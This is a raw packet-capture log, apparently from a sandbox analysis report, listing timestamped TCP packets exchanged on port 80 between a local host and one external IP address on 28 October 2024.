                                                                                                                                                              Oct 28, 2024 19:46:23.971956015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.971991062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972007036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972457886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972491026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972503901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972542048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972575903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972580910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972609997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972645998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972656012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972697020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972729921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972742081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972764969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972798109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972811937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972851038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972883940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972898006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972918034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972950935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.972969055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.972985983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.973037004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.974948883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.974981070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.974997044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975027084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.975034952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975059986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975073099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.975075960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975091934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975109100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.975116968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.975163937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.162339926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168148041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168262959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168303013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168320894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168339014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168382883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168391943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168435097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168469906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168479919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168520927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168554068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168565989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168623924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168658018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168669939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168690920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168724060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168732882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168776035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168824911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168828011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168858051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168891907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168906927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.168951988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168984890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.168997049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.169018984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169068098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.169070005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169105053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169136047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169148922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.169171095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169203043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169219971 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.169239044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169274092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169287920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.169737101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169784069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.169790030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169825077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169871092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.169930935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169965029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.169997931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170020103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.170049906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170084953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170094013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.170118093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170151949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170164108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.170186043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170219898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170232058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.170695066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170738935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.170747995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170783997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170829058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.170867920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170902014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170939922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.170953989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.170974970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171010017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171025038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.171080112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171113014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171132088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.171147108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171180010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171200037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.171710014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171758890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.171761036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171797037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171842098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.171847105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171881914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171914101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171930075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.171947956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.171997070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.171998978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172034025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172068119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172080994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.172101021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172136068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172149897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.172563076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172610998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.172614098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172648907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172684908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.172698021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.174866915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.174911022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.174942970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.226147890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.274732113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.280519009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280632973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280670881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280687094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.280725956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280771017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.280782938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280821085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280858040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280873060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.280952930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.280988932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281001091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281023026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281059027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281068087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281127930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281162024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281172037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281196117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281230927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281243086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281286001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281321049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281328917 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281373978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281408072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281416893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281443119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281477928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281486988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281512976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281548023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281558037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281584024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281626940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.281902075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281955957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.281990051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282001019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.282108068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282141924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282152891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.282193899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282227993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282241106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.282263994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282299995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282305956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.282336950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282380104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.282406092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282442093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282481909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.282869101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.282994986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283041954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283046961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283082962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283117056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283122063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283150911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283185959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283199072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283221960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283267021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283293009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283349037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283384085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283390999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283420086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283464909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283742905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283797979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283828974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283844948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283916950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.283962965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.283970118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284004927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284048080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284091949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284126997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284162045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284171104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284198046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284231901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284240007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284269094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284303904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284312963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284338951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284373999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284382105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284893990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.284986973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.284996033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285048962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285084009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285093069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285118103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285151958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285172939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285191059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285228014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285233974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285312891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285346985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285355091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285384893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285418987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285429001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285897970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285944939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.285950899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.285986900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286022902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286034107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286056042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286112070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286168098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286201954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286236048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286245108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286271095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286313057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286322117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286355972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286390066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286397934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.286930084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286963940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.286976099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287017107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287050962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287061930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287086010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287128925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287137032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287173033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287216902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287224054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287260056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287293911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287305117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287345886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287379980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287388086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287750959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287801981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.287810087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287846088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287880898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.287890911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288285017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288319111 CET8049726166.1.160.211192.168.2.16
